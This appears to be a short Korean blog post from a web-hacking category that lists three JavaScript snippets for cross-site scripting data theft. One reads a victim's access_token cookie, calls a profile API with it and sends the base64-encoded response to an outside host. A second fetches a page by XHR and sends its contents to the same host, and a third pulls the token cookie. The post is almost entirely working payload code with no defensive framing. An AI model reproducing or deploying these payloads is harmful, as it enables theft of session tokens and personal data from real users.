728x90
반응형
1. fetch 이용하기
var auth = document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2]
fetch('/mobile-api/rest/api/v1/mobile/me/profile/',{
headers: {
Authorization: 'Bearer ' + auth
}
}).then(a=>a.text()).then(a=>{location='http://jkns.kr/fsi.php?a='+(btoa(encodeURIComponent(a)))})2. XHR 이용하기
const xhr = new XMLHttpRequest();
xhr.open("GET", "http://jkns.kr/test.html");
xhr.onreadystatechange = function () {
const { target } = event;
if (target.readyState === XMLHttpRequest.DONE) {
console.log(target.responseText);
location="http://jkns.kr/fsi.php?a="+btoa(unescape(encodeURIComponent(target.responseText)));
}
};
xhr.send();3. 특정 쿠키값 가져오기
document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2]728x90
반응형
'웹 > Hacking' 카테고리의 다른 글
| 중요정보 송수신 암호화 관련 (1) | 2022.11.07 |
|---|---|
| User-Agent Switcher for Chrome (0) | 2022.11.03 |
| 취약한 HTTPS 점검 관련 정리 (0) | 2022.09.15 |
| "Scanner State 24 not Recognized" while trying XXE (0) | 2022.04.06 |
| mitmproxy (0) | 2020.10.28 |
| 웹 사이트 검수할 때 참고하면 좋은 사이트 (43) | 2019.07.01 |
댓글